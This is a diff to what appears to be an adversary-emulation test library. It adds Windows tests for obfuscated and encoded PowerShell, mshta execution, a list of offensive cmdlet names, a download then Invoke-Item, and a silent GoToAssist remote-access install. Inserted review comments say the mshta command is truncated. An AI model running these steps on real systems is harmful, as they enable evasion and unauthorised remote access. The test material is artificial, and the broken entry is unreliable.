diff --git a/atomics/Indexes/Indexes-CSV/index.csv b/atomics/Indexes/Indexes-CSV/index.csv
index f2257e0e..910ab46c 100644
--- a/atomics/Indexes/Indexes-CSV/index.csv
+++ b/atomics/Indexes/Indexes-CSV/index.csv
@@ -385,6 +385,7 @@ defense-evasion,T1218.005,Mshta,6,Invoke HTML Application - Direct download from
 defense-evasion,T1218.005,Mshta,7,Invoke HTML Application - JScript Engine with Rundll32 and Inline Protocol Handler,e7e3a525-7612-4d68-a5d3-c4649181b8af,powershell
 defense-evasion,T1218.005,Mshta,8,Invoke HTML Application - JScript Engine with Inline Protocol Handler,d3eaaf6a-cdb1-44a9-9ede-b6c337d0d840,powershell
 defense-evasion,T1218.005,Mshta,9,Invoke HTML Application - Simulate Lateral Movement over UNC Path,b8a8bdb2-7eae-490d-8251-d5e0295b2362,powershell
+defense-evasion,T1218.005,Mshta,10,Mshta used to Execute PowerShell,8707a805-2b76-4f32-b1c0-14e558205772,command_prompt
 defense-evasion,T1218.007,Msiexec,1,Msiexec.exe - Execute Local MSI file,0683e8f7-a27b-4b62-b7ab-dc7d4fed1df8,command_prompt
 defense-evasion,T1218.007,Msiexec,2,Msiexec.exe - Execute Remote MSI file,bde7d2fe-d049-458d-a362-abda32a7e649,command_prompt
 defense-evasion,T1218.007,Msiexec,3,Msiexec.exe - Execute Arbitrary DLL,66f64bd5-7c35-4c24-953a-04ca30a0a0ec,command_prompt
@@ -401,6 +402,7 @@ defense-evasion,T1027,Obfuscated Files or Information,3,Execute base64-encoded P
 defense-evasion,T1027,Obfuscated Files or Information,4,Execution from Compressed File,f8c8a909-5f29-49ac-9244-413936ce6d1f,command_prompt
 defense-evasion,T1027,Obfuscated Files or Information,5,DLP Evasion via Sensitive Data in VBA Macro over email,129edb75-d7b8-42cd-a8ba-1f3db64ec4ad,powershell
 defense-evasion,T1027,Obfuscated Files or Information,6,DLP Evasion via Sensitive Data in VBA Macro over HTTP,e2d85e66-cb66-4ed7-93b1-833fc56c9319,powershell
+defense-evasion,T1027,Obfuscated Files or Information,7,Obfuscated Command in PowerShell,8b3f4ed6-077b-4bdd-891c-2d237f19410f,powershell
 defense-evasion,T1218.008,Odbcconf,1,Odbcconf.exe - Execute Arbitrary DLL,2430498b-06c0-4b92-a448-8ad263c388e2,command_prompt
 defense-evasion,T1134.004,Parent PID Spoofing,1,Parent PID Spoofing using PowerShell,069258f4-2162-46e9-9a25-c9c6c56150d2,powershell
 defense-evasion,T1134.004,Parent PID Spoofing,2,Parent PID Spoofing - Spawn from Current Process,14920ebd-1d61-491a-85e0-fe98efe37f25,powershell
@@ -798,6 +800,8 @@ execution,T1059.001,PowerShell,15,ATHPowerShellCommandLineParameter -Command par
 execution,T1059.001,PowerShell,16,ATHPowerShellCommandLineParameter -Command parameter variations with encoded arguments,1c0a870f-dc74-49cf-9afc-eccc45e58790,powershell
 execution,T1059.001,PowerShell,17,ATHPowerShellCommandLineParameter -EncodedCommand parameter variations,86a43bad-12e3-4e85-b97c-4d5cf25b95c3,powershell
 execution,T1059.001,PowerShell,18,ATHPowerShellCommandLineParameter -EncodedCommand parameter variations with encoded arguments,0d181431-ddf3-4826-8055-2dbf63ae848b,powershell
+execution,T1059.001,PowerShell,19,PowerShell Command Execution,a538de64-1c74-46ed-aa60-b995ed302598,command_prompt
+execution,T1059.001,PowerShell,20,PowerShell Invoke Known Malicious Cmdlets,49eb9404-5e0f-4031-a179-b40f7be385e3,powershell
 execution,T1059.006,Python,1,Execute shell script via python's command mode arguement,3a95cdb2-c6ea-4761-b24e-02b71889b8bb,sh
 execution,T1059.006,Python,2,Execute Python via scripts (Linux),6c4d1dcb-33c7-4c36-a8df-c6cfd0408be8,sh
 execution,T1059.006,Python,3,Execute Python via Python executables (Linux),0b44d79b-570a-4b27-a31f-3bf2156e5eaa,sh
@@ -818,6 +822,7 @@ execution,T1059.005,Visual Basic,2,Encoded VBS code execution,e8209d5f-e42d-45e6
 execution,T1059.005,Visual Basic,3,Extract Memory via VBA,8faff437-a114-4547-9a60-749652a03df6,powershell
 execution,T1059.003,Windows Command Shell,1,Create and Execute Batch Script,9e8894c0-50bd-4525-a96c-d4ac78ece388,powershell
 execution,T1059.003,Windows Command Shell,2,Writes text to a file and displays it.,127b4afe-2346-4192-815c-69042bec570e,command_prompt
+execution,T1059.003,Windows Command Shell,3,Suspicious Execution via Windows Command Shell,d0eb3597-a1b3-4d65-b33b-2cda8d397f20,command_prompt
 execution,T1047,Windows Management Instrumentation,1,WMI Reconnaissance Users,c107778c-dcf5-47c5-af2e-1d058a3df3ea,command_prompt
 execution,T1047,Windows Management Instrumentation,2,WMI Reconnaissance Processes,5750aa16-0e59-4410-8b9a-8a47ca2788e2,command_prompt
 execution,T1047,Windows Management Instrumentation,3,WMI Reconnaissance Software,718aebaa-d0e0-471a-8241-c5afa69c7414,command_prompt
@@ -860,6 +865,7 @@ command-and-control,T1105,Ingress Tool Transfer,11,OSTAP Worming Activity,2ca617
 command-and-control,T1105,Ingress Tool Transfer,12,svchost writing a file to a UNC path,fa5a2759-41d7-4e13-a19c-e8f28a53566f,command_prompt
 command-and-control,T1105,Ingress Tool Transfer,13,Download a File with Windows Defender MpCmdRun.exe,815bef8b-bf91-4b67-be4c-abe4c2a94ccc,command_prompt
 command-and-control,T1105,Ingress Tool Transfer,14,whois file download,c99a829f-0bb8-4187-b2c6-d47d1df74cab,sh
+command-and-control,T1105,Ingress Tool Transfer,15,File Download via PowerShell,54a4daf1-71df-4383-9ba7-f1a295d8b6d2,powershell
 command-and-control,T1090.001,Internal Proxy,1,Connection Proxy,0ac21132-4485-4212-a681-349e8a6637cd,sh
 command-and-control,T1090.001,Internal Proxy,2,Connection Proxy for macOS UI,648d68c1-8bcd-4486-9abe-71c6655b6a2c,sh
 command-and-control,T1090.001,Internal Proxy,3,portproxy reg key,b8223ea9-4be2-44a6-b50a-9657a3d4e72a,powershell
@@ -871,6 +877,7 @@ command-and-control,T1571,Non-Standard Port,2,Testing usage of uncommonly used p
 command-and-control,T1219,Remote Access Software,1,TeamViewer Files Detected Test on Windows,8ca3b96d-8983-4a7f-b125-fc98cc0a2aa0,powershell
 command-and-control,T1219,Remote Access Software,2,AnyDesk Files Detected Test on Windows,6b8b7391-5c0a-4f8c-baee-78d8ce0ce330,powershell
 command-and-control,T1219,Remote Access Software,3,LogMeIn Files Detected Test on Windows,d03683ec-aae0-42f9-9b4c-534780e0f8e1,powershell
+command-and-control,T1219,Remote Access Software,4,GoToAssist Files Detected Test on Windows,1b72b3bd-72f8-4b63-a30b-84e91b9c3578,powershell
 command-and-control,T1132.001,Standard Encoding,1,Base64 Encoded data.,1164f70f-9a88-4dff-b9ff-dc70e7bf0c25,sh
 command-and-control,T1132.001,Standard Encoding,2,XOR Encoded data.,c3ed6d2a-e3ad-400d-ad78-bbfdbfeacc08,powershell
 command-and-control,T1071.001,Web Protocols,1,Malicious User Agents - Powershell,81c13829-f6c9-45b8-85a6-053366d55297,powershell
diff --git a/atomics/Indexes/Indexes-CSV/windows-index.csv b/atomics/Indexes/Indexes-CSV/windows-index.csv
index b338da52..6a11056d 100644
--- a/atomics/Indexes/Indexes-CSV/windows-index.csv
+++ b/atomics/Indexes/Indexes-CSV/windows-index.csv
@@ -257,6 +257,7 @@ defense-evasion,T1218.005,Mshta,6,Invoke HTML Application - Direct download from
 defense-evasion,T1218.005,Mshta,7,Invoke HTML Application - JScript Engine with Rundll32 and Inline Protocol Handler,e7e3a525-7612-4d68-a5d3-c4649181b8af,powershell
 defense-evasion,T1218.005,Mshta,8,Invoke HTML Application - JScript Engine with Inline Protocol Handler,d3eaaf6a-cdb1-44a9-9ede-b6c337d0d840,powershell
 defense-evasion,T1218.005,Mshta,9,Invoke HTML Application - Simulate Lateral Movement over UNC Path,b8a8bdb2-7eae-490d-8251-d5e0295b2362,powershell
+defense-evasion,T1218.005,Mshta,10,Mshta used to Execute PowerShell,8707a805-2b76-4f32-b1c0-14e558205772,command_prompt
 defense-evasion,T1218.007,Msiexec,1,Msiexec.exe - Execute Local MSI file,0683e8f7-a27b-4b62-b7ab-dc7d4fed1df8,command_prompt
 defense-evasion,T1218.007,Msiexec,2,Msiexec.exe - Execute Remote MSI file,bde7d2fe-d049-458d-a362-abda32a7e649,command_prompt
 defense-evasion,T1218.007,Msiexec,3,Msiexec.exe - Execute Arbitrary DLL,66f64bd5-7c35-4c24-953a-04ca30a0a0ec,command_prompt
@@ -272,6 +273,7 @@ defense-evasion,T1027,Obfuscated Files or Information,3,Execute base64-encoded P
 defense-evasion,T1027,Obfuscated Files or Information,4,Execution from Compressed File,f8c8a909-5f29-49ac-9244-413936ce6d1f,command_prompt
 defense-evasion,T1027,Obfuscated Files or Information,5,DLP Evasion via Sensitive Data in VBA Macro over email,129edb75-d7b8-42cd-a8ba-1f3db64ec4ad,powershell
 defense-evasion,T1027,Obfuscated Files or Information,6,DLP Evasion via Sensitive Data in VBA Macro over HTTP,e2d85e66-cb66-4ed7-93b1-833fc56c9319,powershell
+defense-evasion,T1027,Obfuscated Files or Information,7,Obfuscated Command in PowerShell,8b3f4ed6-077b-4bdd-891c-2d237f19410f,powershell
 defense-evasion,T1218.008,Odbcconf,1,Odbcconf.exe - Execute Arbitrary DLL,2430498b-06c0-4b92-a448-8ad263c388e2,command_prompt
 defense-evasion,T1134.004,Parent PID Spoofing,1,Parent PID Spoofing using PowerShell,069258f4-2162-46e9-9a25-c9c6c56150d2,powershell
 defense-evasion,T1134.004,Parent PID Spoofing,2,Parent PID Spoofing - Spawn from Current Process,14920ebd-1d61-491a-85e0-fe98efe37f25,powershell
@@ -528,6 +530,7 @@ command-and-control,T1105,Ingress Tool Transfer,10,Windows - PowerShell Download
 command-and-control,T1105,Ingress Tool Transfer,11,OSTAP Worming Activity,2ca61766-b456-4fcf-a35a-1233685e1cad,command_prompt
 command-and-control,T1105,Ingress Tool Transfer,12,svchost writing a file to a UNC path,fa5a2759-41d7-4e13-a19c-e8f28a53566f,command_prompt
 command-and-control,T1105,Ingress Tool Transfer,13,Download a File with Windows Defender MpCmdRun.exe,815bef8b-bf91-4b67-be4c-abe4c2a94ccc,command_prompt
+command-and-control,T1105,Ingress Tool Transfer,15,File Download via PowerShell,54a4daf1-71df-4383-9ba7-f1a295d8b6d2,powershell
 command-and-control,T1090.001,Internal Proxy,3,portproxy reg key,b8223ea9-4be2-44a6-b50a-9657a3d4e72a,powershell
 command-and-control,T1095,Non-Application Layer Protocol,1,ICMP C2,0268e63c-e244-42db-bef7-72a9e59fc1fc,powershell
 command-and-control,T1095,Non-Application Layer Protocol,2,Netcat C2,bcf0d1c1-3f6a-4847-b1c9-7ed4ea321f37,powershell
@@ -536,6 +539,7 @@ command-and-control,T1571,Non-Standard Port,1,Testing usage of uncommonly used p
 command-and-control,T1219,Remote Access Software,1,TeamViewer Files Detected Test on Windows,8ca3b96d-8983-4a7f-b125-fc98cc0a2aa0,powershell
 command-and-control,T1219,Remote Access Software,2,AnyDesk Files Detected Test on Windows,6b8b7391-5c0a-4f8c-baee-78d8ce0ce330,powershell
 command-and-control,T1219,Remote Access Software,3,LogMeIn Files Detected Test on Windows,d03683ec-aae0-42f9-9b4c-534780e0f8e1,powershell
+command-and-control,T1219,Remote Access Software,4,GoToAssist Files Detected Test on Windows,1b72b3bd-72f8-4b63-a30b-84e91b9c3578,powershell
 command-and-control,T1132.001,Standard Encoding,2,XOR Encoded data.,c3ed6d2a-e3ad-400d-ad78-bbfdbfeacc08,powershell
 command-and-control,T1071.001,Web Protocols,1,Malicious User Agents - Powershell,81c13829-f6c9-45b8-85a6-053366d55297,powershell
 command-and-control,T1071.001,Web Protocols,2,Malicious User Agents - CMD,dc3488b0-08c7-4fea-b585-905c83b48180,command_prompt
@@ -570,6 +574,8 @@ execution,T1059.001,PowerShell,15,ATHPowerShellCommandLineParameter -Command par
 execution,T1059.001,PowerShell,16,ATHPowerShellCommandLineParameter -Command parameter variations with encoded arguments,1c0a870f-dc74-49cf-9afc-eccc45e58790,powershell
 execution,T1059.001,PowerShell,17,ATHPowerShellCommandLineParameter -EncodedCommand parameter variations,86a43bad-12e3-4e85-b97c-4d5cf25b95c3,powershell
 execution,T1059.001,PowerShell,18,ATHPowerShellCommandLineParameter -EncodedCommand parameter variations with encoded arguments,0d181431-ddf3-4826-8055-2dbf63ae848b,powershell
+execution,T1059.001,PowerShell,19,PowerShell Command Execution,a538de64-1c74-46ed-aa60-b995ed302598,command_prompt
+execution,T1059.001,PowerShell,20,PowerShell Invoke Known Malicious Cmdlets,49eb9404-5e0f-4031-a179-b40f7be385e3,powershell
 execution,T1053.005,Scheduled Task,1,Scheduled Task Startup Script,fec27f65-db86-4c2d-b66c-61945aee87c2,command_prompt
 execution,T1053.005,Scheduled Task,2,Scheduled task Local,42f53695-ad4a-4546-abb6-7d837f644a71,command_prompt
 execution,T1053.005,Scheduled Task,3,Scheduled task Remote,2e5eac3e-327b-4a88-a0c0-c4057039a8dd,command_prompt
@@ -584,6 +590,7 @@ execution,T1059.005,Visual Basic,2,Encoded VBS code execution,e8209d5f-e42d-45e6 execution,T1059.005,Visual Basic,3,Extract Memory via VBA,8faff437-a114-4547-9a60-749652a03df6,powershell execution,T1059.003,Windows Command Shell,1,Create and Execute Batch Script,9e8894c0-50bd-4525-a96c-d4ac78ece388,powershell execution,T1059.003,Windows Command Shell,2,Writes text to a file and displays it.,127b4afe-2346-4192-815c-69042bec570e,command_prompt +execution,T1059.003,Windows Command Shell,3,Suspicious Execution via Windows Command Shell,d0eb3597-a1b3-4d65-b33b-2cda8d397f20,command_prompt execution,T1047,Windows Management Instrumentation,1,WMI Reconnaissance Users,c107778c-dcf5-47c5-af2e-1d058a3df3ea,command_prompt execution,T1047,Windows Management Instrumentation,2,WMI Reconnaissance Processes,5750aa16-0e59-4410-8b9a-8a47ca2788e2,command_prompt execution,T1047,Windows Management Instrumentation,3,WMI Reconnaissance Software,718aebaa-d0e0-471a-8241-c5afa69c7414,command_prompt diff --git a/atomics/Indexes/Indexes-Markdown/index.md b/atomics/Indexes/Indexes-Markdown/index.md index 21b70104..271dc6af 100644 --- a/atomics/Indexes/Indexes-Markdown/index.md +++ b/atomics/Indexes/Indexes-Markdown/index.md @@ -662,6 +662,7 @@ - Atomic Test #7: Invoke HTML Application - JScript Engine with Rundll32 and Inline Protocol Handler [windows] - Atomic Test #8: Invoke HTML Application - JScript Engine with Inline Protocol Handler [windows] - Atomic Test #9: Invoke HTML Application - Simulate Lateral Movement over UNC Path [windows] + - Atomic Test #10: Mshta used to Execute PowerShell [windows] - [T1218.007 Msiexec](../../T1218.007/T1218.007.md) - Atomic Test #1: Msiexec.exe - Execute Local MSI file [windows] - Atomic Test #2: Msiexec.exe - Execute Remote MSI file [windows] 
@@ -685,6 +686,7 @@ - Atomic Test #4: Execution from Compressed File [windows] - Atomic Test #5: DLP Evasion via Sensitive Data in VBA Macro over email [windows] - Atomic Test #6: DLP Evasion via Sensitive Data in VBA Macro over HTTP [windows] + - Atomic Test #7: Obfuscated Command in PowerShell [windows] - [T1218.008 Odbcconf](../../T1218.008/T1218.008.md) - Atomic Test #1: Odbcconf.exe - Execute Arbitrary DLL [windows] - [T1134.004 Parent PID Spoofing](../../T1134.004/T1134.004.md) @@ -1436,6 +1438,8 @@ - Atomic Test #16: ATHPowerShellCommandLineParameter -Command parameter variations with encoded arguments [windows] - Atomic Test #17: ATHPowerShellCommandLineParameter -EncodedCommand parameter variations [windows] - Atomic Test #18: ATHPowerShellCommandLineParameter -EncodedCommand parameter variations with encoded arguments [windows] + - Atomic Test #19: PowerShell Command Execution [windows] + - Atomic Test #20: PowerShell Invoke Known Malicious Cmdlets [windows] - [T1059.006 Python](../../T1059.006/T1059.006.md) - Atomic Test #1: Execute shell script via python's command mode arguement [linux] - Atomic Test #2: Execute Python via scripts (Linux) [linux] @@ -1470,6 +1474,7 @@ - [T1059.003 Windows Command Shell](../../T1059.003/T1059.003.md) - Atomic Test #1: Create and Execute Batch Script [windows] - Atomic Test #2: Writes text to a file and displays it. [windows] + - Atomic Test #3: Suspicious Execution via Windows Command Shell [windows] - [T1047 Windows Management Instrumentation](../../T1047/T1047.md) - Atomic Test #1: WMI Reconnaissance Users [windows] - Atomic Test #2: WMI Reconnaissance Processes [windows] 
@@ -1559,6 +1564,7 @@ - Atomic Test #12: svchost writing a file to a UNC path [windows] - Atomic Test #13: Download a File with Windows Defender MpCmdRun.exe [windows] - Atomic Test #14: whois file download [linux, macos] + - Atomic Test #15: File Download via PowerShell [windows] - [T1090.001 Internal Proxy](../../T1090.001/T1090.001.md) - Atomic Test #1: Connection Proxy [macos, linux] - Atomic Test #2: Connection Proxy for macOS UI [macos] @@ -1585,6 +1591,7 @@ - Atomic Test #1: TeamViewer Files Detected Test on Windows [windows] - Atomic Test #2: AnyDesk Files Detected Test on Windows [windows] - Atomic Test #3: LogMeIn Files Detected Test on Windows [windows] + - Atomic Test #4: GoToAssist Files Detected Test on Windows [windows] - [T1132.001 Standard Encoding](../../T1132.001/T1132.001.md) - Atomic Test #1: Base64 Encoded data. [macos, linux] - Atomic Test #2: XOR Encoded data. [windows] diff --git a/atomics/Indexes/Indexes-Markdown/windows-index.md b/atomics/Indexes/Indexes-Markdown/windows-index.md index d85cc21e..672d6010 100644 --- a/atomics/Indexes/Indexes-Markdown/windows-index.md +++ b/atomics/Indexes/Indexes-Markdown/windows-index.md @@ -470,6 +470,7 @@ - Atomic Test #7: Invoke HTML Application - JScript Engine with Rundll32 and Inline Protocol Handler [windows] - Atomic Test #8: Invoke HTML Application - JScript Engine with Inline Protocol Handler [windows] - Atomic Test #9: Invoke HTML Application - Simulate Lateral Movement over UNC Path [windows] + - Atomic Test #10: Mshta used to Execute PowerShell [windows] - [T1218.007 Msiexec](../../T1218.007/T1218.007.md) - Atomic Test #1: Msiexec.exe - Execute Local MSI file [windows] - Atomic Test #2: Msiexec.exe - Execute Remote MSI file [windows] 
@@ -489,6 +490,7 @@ - Atomic Test #4: Execution from Compressed File [windows] - Atomic Test #5: DLP Evasion via Sensitive Data in VBA Macro over email [windows] - Atomic Test #6: DLP Evasion via Sensitive Data in VBA Macro over HTTP [windows] + - Atomic Test #7: Obfuscated Command in PowerShell [windows] - [T1218.008 Odbcconf](../../T1218.008/T1218.008.md) - Atomic Test #1: Odbcconf.exe - Execute Arbitrary DLL [windows] - [T1134.004 Parent PID Spoofing](../../T1134.004/T1134.004.md) @@ -960,6 +962,7 @@ - Atomic Test #11: OSTAP Worming Activity [windows] - Atomic Test #12: svchost writing a file to a UNC path [windows] - Atomic Test #13: Download a File with Windows Defender MpCmdRun.exe [windows] + - Atomic Test #15: File Download via PowerShell [windows] - [T1090.001 Internal Proxy](../../T1090.001/T1090.001.md) - Atomic Test #3: portproxy reg key [windows] - T1001.001 Junk Data [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) @@ -983,6 +986,7 @@ - Atomic Test #1: TeamViewer Files Detected Test on Windows [windows] - Atomic Test #2: AnyDesk Files Detected Test on Windows [windows] - Atomic Test #3: LogMeIn Files Detected Test on Windows [windows] + - Atomic Test #4: GoToAssist Files Detected Test on Windows [windows] - [T1132.001 Standard Encoding](../../T1132.001/T1132.001.md) - Atomic Test #2: XOR Encoded data. [windows] - T1001.002 Steganography [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) 
@@ -1038,6 +1042,8 @@ - Atomic Test #16: ATHPowerShellCommandLineParameter -Command parameter variations with encoded arguments [windows] - Atomic Test #17: ATHPowerShellCommandLineParameter -EncodedCommand parameter variations [windows] - Atomic Test #18: ATHPowerShellCommandLineParameter -EncodedCommand parameter variations with encoded arguments [windows] + - Atomic Test #19: PowerShell Command Execution [windows] + - Atomic Test #20: PowerShell Invoke Known Malicious Cmdlets [windows] - T1059.006 Python [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) - [T1053.005 Scheduled Task](../../T1053.005/T1053.005.md) - Atomic Test #1: Scheduled Task Startup Script [windows] @@ -1063,6 +1069,7 @@ - [T1059.003 Windows Command Shell](../../T1059.003/T1059.003.md) - Atomic Test #1: Create and Execute Batch Script [windows] - Atomic Test #2: Writes text to a file and displays it. [windows] + - Atomic Test #3: Suspicious Execution via Windows Command Shell [windows] - [T1047 Windows Management Instrumentation](../../T1047/T1047.md) - Atomic Test #1: WMI Reconnaissance Users [windows] - Atomic Test #2: WMI Reconnaissance Processes [windows] diff --git a/atomics/Indexes/index.yaml b/atomics/Indexes/index.yaml index 4f451fdb..3bf345c7 100644 --- a/atomics/Indexes/index.yaml +++ b/atomics/Indexes/index.yaml 
@@ -28655,6 +28655,28 @@ defense-evasion: command: 'Invoke-ATHHTMLApplication -TemplatePE -AsLocalUNCPath -MSHTAFilePath #{mshta_file_path}' name: powershell + - name: Mshta used to Execute PowerShell + auto_generated_guid: 8707a805-2b76-4f32-b1c0-14e558205772 + description: 'Use Mshta to execute arbitrary PowerShell. Example is from the + 2021 Threat Detection Report by Red Canary. + +' + supported_platforms: + - windows + input_arguments: + message: + description: Encoded message to include + type: string + default: Hello,%20MSHTA! + seconds_to_sleep: + description: How many seconds to sleep/wait + type: string + default: 5 + executor: + command: 'mshta.exe "about:''" + +' + name: command_prompt T1218.007: technique: id: attack-pattern--365be77f-fc0e-42ee-bac8-4faf806d9336 @@ -29529,6 +29551,25 @@ defense-evasion: executor: command: 'Invoke-WebRequest -Uri #{ip_address} -Method POST -Body #{input_file} +' + name: powershell + - name: Obfuscated Command in PowerShell + auto_generated_guid: 8b3f4ed6-077b-4bdd-891c-2d237f19410f + description: 'This is an obfuscated PowerShell command which when executed prints + "Hello, from PowerShell!". Example is from the 2021 Threat Detection Report + by Red Canary. + +' + supported_platforms: + - windows + executor: + command: '$cmDwhy =[TyPe]("{0}{1}" -f ''S'',''TrING'') ; $pz2Sb0 =[TYpE]("{1}{0}{2}"-f''nv'',''cO'',''ert'') ; &("{0}{2}{3}{1}{4}" + -f''In'',''SiO'',''vOKe-EXp'',''ReS'',''n'') ( (&("{1}{2}{0}"-f''blE'',''gET-'',''vaRIA'') (''CMdw''+''h''+''y''))."v`ALUe"::("{1}{0}" + -f''iN'',''jO'').Invoke('''',( (127, 162,151, 164,145 ,55 , 110 ,157 ,163 + , 164 ,40,47, 110 , 145 ,154, 154 ,157 , 54 ,40, 146, 162 , 157,155 ,40, + 120, 157 ,167,145 , 162 ,123,150 ,145 , 154 , 154 , 41,47)| .(''%'') { ( + [CHAR] ( $Pz2sB0::"t`OinT`16"(( [sTring]${_}) ,8)))})) ) + ' name: powershell T1218.008: 
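Review bot: In the new `Mshta used to Execute PowerShell` entry the executor command as shown is only `mshta.exe "about:'"`, which references neither `#{message}` nor `#{seconds_to_sleep}`, so both declared input_arguments are dead and nothing in the command launches PowerShell despite the description. If an inline `<script>` payload was stripped from this rendering of the diff, disregard, but otherwise the command needs the script body that consumes both inputs, and the test should be run once to confirm it yields the `mshta.exe` → `powershell.exe` parent/child chain the title implies. This index entry is generated from T1218.005.yaml, which is not in the diff view, so the fix belongs there rather than in index.yaml.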
@@ -60105,6 +60146,55 @@ execution: -EncodedArgumentsParamVariation #{encoded_arguments_param_variation} -Execute -ErrorAction Stop' name: powershell + - name: PowerShell Command Execution + auto_generated_guid: a538de64-1c74-46ed-aa60-b995ed302598 + description: 'Use of obfuscated PowerShell to execute an arbitrary command; + outputs "Hello, from PowerShell!". Example is from the 2021 Threat Detection + Report by Red Canary. + +' + supported_platforms: + - windows + input_arguments: + obfuscated_code: + description: 'Defaults to: Invoke-Expression with a "Write-Host" line.' + type: string + default: JgAgACgAZwBjAG0AIAAoACcAaQBlAHsAMAB9ACcAIAAtAGYAIAAnAHgAJwApACkAIAAoACIAVwByACIAKwAiAGkAdAAiACsAIgBlAC0ASAAiACsAIgBvAHMAdAAgACcASAAiACsAIgBlAGwAIgArACIAbABvACwAIABmAHIAIgArACIAbwBtACAAUAAiACsAIgBvAHcAIgArACIAZQByAFMAIgArACIAaAAiACsAIgBlAGwAbAAhACcAIgApAA== + executor: + command: 'powershell.exe -e #{obfuscated_code} + +' + name: command_prompt + - name: PowerShell Invoke Known Malicious Cmdlets + auto_generated_guid: 49eb9404-5e0f-4031-a179-b40f7be385e3 + description: Powershell execution of known Malicious PowerShell Cmdlets + supported_platforms: + - windows + input_arguments: + Malicious_cmdlets: + description: Known Malicious Cmdlets + type: String + default: '"Add-Persistence", "Find-AVSignature", "Get-GPPAutologon", "Get-GPPPassword", + "Get-HttpStatus", "Get-Keystrokes", "Get-SecurityPackages", "Get-TimedScreenshot", + "Get-VaultCredential", "Get-VolumeShadowCopy", "Install-SSP", "Invoke-CredentialInjection", + "Invoke-DllInjection", "Invoke-Mimikatz", "Invoke-NinjaCopy", "Invoke-Portscan", + "Invoke-ReflectivePEInjection", "Invoke-ReverseDnsLookup", "Invoke-Shellcode", + "Invoke-TokenManipulation", "Invoke-WmiCommand", "Mount-VolumeShadowCopy", + "New-ElevatedPersistenceOption", "New-UserPersistenceOption", "New-VolumeShadowCopy", + "Out-CompressedDll", "Out-EncodedCommand", "Out-EncryptedScript", "Out-Minidump", + "PowerUp", "PowerView", "Remove-Comments", 
"Remove-VolumeShadowCopy", + "Set-CriticalProcess", "Set-MasterBootRecord" + +' + executor: + name: powershell + elevation_required: true + command: |- + $malcmdlets = #{Malicious_cmdlets} + foreach ($cmdlets in $malcmdlets) { + "function $cmdlets { Write-Host Pretending to invoke $cmdlets }"} + foreach ($cmdlets in $malcmdlets) { + $cmdlets} T1059.006: technique: external_references: @@ -61581,6 +61671,27 @@ execution: ' name: command_prompt + - name: Suspicious Execution via Windows Command Shell + auto_generated_guid: d0eb3597-a1b3-4d65-b33b-2cda8d397f20 + description: 'Command line executed via suspicious invocation. Example is from + the 2021 Threat Detection Report by Red Canary. + +' + supported_platforms: + - windows + input_arguments: + output_file: + description: File to output to + type: string + default: hello.txt + input_message: + description: Message to write to file + type: string + default: Hello, from CMD! + executor: + command: "%LOCALAPPDATA:~-3,1%md /c echo #{input_message} > #{output_file} + & type #{output_file}\n" + name: command_prompt T1047: technique: id: attack-pattern--01a5a209-b94c-450b-b7f9-946497d91055 
@@ -65221,6 +65332,27 @@ command-and-control: cleanup_command: 'rm -f #{output_file} ' + - name: File Download via PowerShell + auto_generated_guid: 54a4daf1-71df-4383-9ba7-f1a295d8b6d2 + description: 'Use PowerShell to download and write an arbitrary file from the + internet. Example is from the 2021 Threat Detection Report by Red Canary. + +' + supported_platforms: + - windows + input_arguments: + target_remote_file: + description: File to download + type: string + default: https://raw.githubusercontent.com/redcanaryco/atomic-red-team/4042cb3433bce024e304500dcfe3c5590571573a/LICENSE.txt + output_file: + description: File to write to + type: string + default: LICENSE.txt + executor: + command: "(New-Object Net.WebClient).DownloadString('#{target_remote_file}') + | Out-File #{output_file}; Invoke-Item #{output_file}\n" + name: powershell T1090.001: technique: external_references: 
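Review bot: `File Download via PowerShell` leaves `#{output_file}` on disk with no `cleanup_command`, and `Invoke-Item #{output_file}` hands the file to the shell's default handler, which for the default `.txt` opens an editor window that outlives the test. Add `cleanup_command: Remove-Item #{output_file} -ErrorAction Ignore` and consider `Get-Content #{output_file}` instead of `Invoke-Item` unless opening the file is the behaviour being exercised, since with a different `output_file` extension `Invoke-Item` would execute whatever the remote URL served. The source T1105.yaml this entry is generated from is not in the diff view.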
@@ -66242,6 +66374,23 @@ command-and-control: $file1 -ErrorAction Ignore" name: powershell elevation_required: true + - name: GoToAssist Files Detected Test on Windows + auto_generated_guid: 1b72b3bd-72f8-4b63-a30b-84e91b9c3578 + description: 'An adversary may attempt to trick the user into downloading GoToAssist + and use to establish C2. Download of GoToAssist installer will be at the destination + location and ran when sucessfully executed. + +' + supported_platforms: + - windows + executor: + command: | + Invoke-WebRequest -OutFile C:\Users\$env:username\Downloads\GoToAssist.exe "https://launch.getgo.com/launcher2/helper?token=e0-FaCddxmtMoX8_cY4czssnTeGvy83ihp8CLREfvwQshiBW0_RcbdoaEp8IA-Qn8wpbKlpGIflS-39gW6RuWRM-XHwtkRVMLBsp5RSKp-a3PBM-Pb1Fliy73EDgoaxr-q83WtXbLKqD7-u3cfDl9gKsymmhdkTGsXcDXir90NqKj92LsN_KpyYwV06lIxsdRekhNZjNwhkWrBa_hG8RQJqWSGk6tkZLVMuMufmn37eC2Cqqiwq5bCGnH5dYiSUUsklSedRLjh4N46qPYT1bAU0qD25ZPr-Kvf4Kzu9bT02q3Yntj02ZA99TxL2-SKzgryizoopBPg4Ilfo5t78UxKTYeEwo4etQECfkCRvenkTRlIHmowdbd88zz7NiccXnbHJZehgs6_-JSVjQIdPTXZbF9T5z44mi4BQYMtZAS3DE86F0C3D4Tcd7fa5F6Ve8rQWt7pvqFCYyiJAailslxOw0LsGyFokoy65tMF980ReP8zhVcTKYP8s8mhGXihUQJQPNk20Sw&downloadTrigger=restart&renameFile=1" + $file1 = "C:\Users\" + $env:username + "\Downloads\GoToAssist.exe" + Start-Process $file1 /S; + cleanup_command: try{$PathToAtomicsFolder/T1219/Bin/GoToCleanup.ps1} catch{} + name: powershell + elevation_required: true T1132.001: technique: external_references: diff --git a/atomics/T1027/T1027.md b/atomics/T1027/T1027.md index e40093ff..93dfbd53 100644 --- a/atomics/T1027/T1027.md +++ b/atomics/T1027/T1027.md @@ -22,6 +22,8 @@ Adversaries may also obfuscate commands executed from payloads or directly via a - [Atomic Test #6 - DLP Evasion via Sensitive Data in VBA Macro over HTTP](#atomic-test-6---dlp-evasion-via-sensitive-data-in-vba-macro-over-http) +- [Atomic Test #7 - Obfuscated Command in PowerShell](#atomic-test-7---obfuscated-command-in-powershell) +
